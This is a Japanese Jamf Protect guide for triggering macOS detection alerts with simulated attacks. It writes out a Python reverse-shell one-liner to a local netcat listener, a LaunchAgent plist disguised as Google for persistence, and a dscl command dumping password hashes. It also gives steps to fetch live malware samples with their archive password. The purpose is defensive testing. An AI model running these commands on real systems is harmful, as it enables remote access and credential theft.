脅威の検出のテスト

Jamf Protect エージェントがコンピュータにインストールされると、脅威の検出を以下の一連の脅威シミュレーションでテストできます。各シミュレーションは内蔵 Analytic をターゲットとします。

免責事項: 本ガイドの一部のテストでは、既知のマルウェアをダウンロードする必要があります。テストの実施時には、適切な予防措置を必ず講じてください。運用環境や重要なインフラストラクチャとは隔離されているコントロールされている環境にて、悪意のあるソフトウェアをテストするために承認されているコンピュータやそのため専用のコンピュータを使って、テストを行うことを推奨します。Jamf は、本書類またはリンクされているウェブサイトに記載されている資料の使用または依存の結果として生じる可能性のある損失、ダメージ、コスト、費用に対して責任や義務を負いません。

コマンド & コントロール (リモートアクセス) ツール

リバースシェルによるコマンド & コントロール (リモートアクセス) の攻撃は、ターゲットコンピュータと攻撃者のコンピュータの間で接続を確立させる際によく利用される方法です。サーバとして機能する攻撃者のコンピュータは、ターゲットコンピュータからの指定ポートで着信接続をリッスンします。攻撃者は、リバースシェルをすばやく作成するために、Python をよく使用します。

この挙動を監視する Jamf Protect の内蔵 Analytic をテストするには、以下を実行します。

  1. Terminal で、以下のコマンドを実行して、ローカルホストポート 8080 で netcat リスナーを起動します。

    nc -l 8080

  2. 別の Terminal ウィンドウで、以下のコマンドを実行することにより、Python リバースシェルを作成して、ポート 8080 のローカルホストに接続します。

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    netcat ウィンドウで、リバースシェルが表示されるようになり、これにより netcat リスナーでコマンドを入力できるようになるはずです。

  3. 「exit (終了)」を入力することにより、netcat ウィンドウを閉じます。

  4. Jamf Protect で、Alerts (アラート) をクリックします。「PythonReverseShell」というエントリが表示されるはずです。

防衛回避となりすまし

攻撃者は、偽の PLIST ファイルなど、永続サービスとしてマルウェアを偽装することがあります。

この挙動を監視する Jamf Protect の内蔵 Analytic をテストするには、以下を実行します。

  1. 以下のコマンドを実行して、一時フォルダへバイナリをコピーします。

    cp /usr/bin/whoami /tmp/test

  2. 以下のコマンドを実行して、バイナリの永続ファイルを作成します。 

    cat >~/Library/LaunchAgents/com.google.analytictest.plist <<EOL 
    <?xml version="1.0" encoding="UTF-8"?> 
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
    <plist version="1.0"> 
    <dict> 
    <key>Label</key> 
    <string>com.google.test</string> 
    <key>ProgramArguments</key> 
    <array> 
    <string>/tmp/test</string> 
    </array> 
    <key>RunAtLoad</key> 
    <true/> 
    </dict> 
    </plist> 
    EOL

  3. Jamf Protect で、Logs (ログ) をクリックします。「LaunchAgent, PlistDisguisedAsGoogle」というエントリが表示されるはずです。

  4. 以下のコマンドを実行して、手順 1 ~ 2 で作成されたファイルを削除します。

    rm /tmp/test

    rm ~/Library/LaunchAgents/com.google.test.plist

認証情報へのアクセスとダンピング

認証情報ダンピング (「Pass-the-Hash」または「ハッシュダンピング」とも呼ばれます) は、ユーザ名またはパスワードのハッシュを取得し、アカウントへアクセスするために使用される方法です。

この挙動を監視する Jamf Protect の内蔵 Analytic をテストするには、以下を実行します。

  1. 以下のコマンドを実行します:

    sudo dscl . read /Users/$USER dsAttrTypeNative:ShadowHashData | xxd -p -r | plutil -convert xml1 - -o -

  2. Jamf Protect で、Alerts をクリックします。「Hashdump」というエントリが表示されるはずです。

内蔵の Apple Security サービス

Apple 内蔵アンチウイルスアプリケーションである XProtect は、起動する前にバイナリをスキャンし、特定されたマルウェアをブロックします。エンドユーザにはポップアップウィンドウで警告が表示されますが、追加の可視性のため、Jamf Protect は XProtect アクティビティもログに記録します。

この挙動を監視する Jamf Protect の内蔵 Analytic をテストするには、以下を実行します。

警告: このテストには、既知のマルウェアのダウンロードが必要です。このテストで使用されるマルウェアを感染させる際には、仮想マシンを必ず使用してください。

  1. 仮想マシンで、Objective-See Mac マルウェアに関する以下のウェブサイトから「Proton」をダウンロードします。https://objective-see.com/malware.html

  2. ダウンロードされたファイルを開きます。プロンプトが表示されたら、以下のパスワードを入力します。「infect3d」

  3. 以下のフォルダを開きます。Proton/Proton.B

  4. 「handbrake.dmg」を開きます。

    注: Handbrake は、サプライチェーン攻撃で一度感染されたことのある安全なアプリケーションです。このサンプルは改変されたバージョンです。

  5. 仮想マシンで、DMG をイジェクトすることを促すポップアップウィンドウが表示されることを確認してください。

  6. Jamf Protect で、Alerts をクリックします。以下で次の内容が表示されるはずです。

    1. macOS 10.14 以前では、XProtect エントリが表示されるはずです。

    2. macOS 10.15 では、GatekeeperBlocked エントリが表示されるはずです。

DNS リダイレクトと中間者攻撃

ドメインネームサービス (DNS) リダイレクト (DNS ハイジャックとも呼ばれます) は、MITM (中間者攻撃) の方法の一種で、ユーザの DNS サーバ設定を変更することにより DNS 検索プロトコルへの挿入を行うために攻撃者に使用されます。変更されると、攻撃者はウェブサイトをオフラインに表示したり、代わりに悪意のあるウェブサイトにトラフィックをリダイレクトしたりして、ウェブサイトのトラフィックを操作できます。

この挙動を監視する Jamf Protect の内蔵 Analytic をテストするためには、以下を実行します。

  1. Terminal で、次のコマンドを実行します。

    networksetup -setdnsservers Wi-Fi 8.8.8.8

  2. Jamf Protect で、Alerts をクリックします。「DnsModification」というエントリが表示されるはずです。

  3. 以下のコマンドを実行することにより、手順 1 で行った DNS サーバの変更を元に戻します。

    networksetup -setdnsservers Wi-Fi "Empty"

既知のマルウェア

「AppleJeus」は、直近の既知のマルウェアアプリケーションで、Lazarus グループにより作成されています。これは、暗号通貨交換をターゲットとするために使用されていました。

この挙動を監視する Jamf Protect の内蔵 Analytic をテストするには、以下を実行します。

警告: このテストには、既知のマルウェアのダウンロードが必要です。このテストで使用されるマルウェアを感染させる際には、仮想マシンを必ず使用してください。

  1. 仮想マシンで、Objective-See Mac マルウェアに関する以下のウェブサイトから「AppleJeus」をダウンロードします。https://objective-see.com/malware.html

  2. ダウンロードされたファイルを開きます。プロンプトが表示されたら、以下のパスワードを入力します。「infect3d」

  3. 「AppleJeus > A > CelasTradePro.dmg」を開きます。

  4. 「CelasTradPro.dmg」で Control キーを押しながらクリックしてから、Open with (このアプリケーションで開く) > Installer.app をクリックします。

  5. 画面上の指示に従って PKG をインストールします。

  6. Jamf Protect で、Alerts (アラート) をクリックします。「AppleJeus」というエントリが表示されるはずです。

Copyright     個人情報保護方針     使用条件     セキュリティ
© copyright 2002-2020 Jamf. All rights reserved.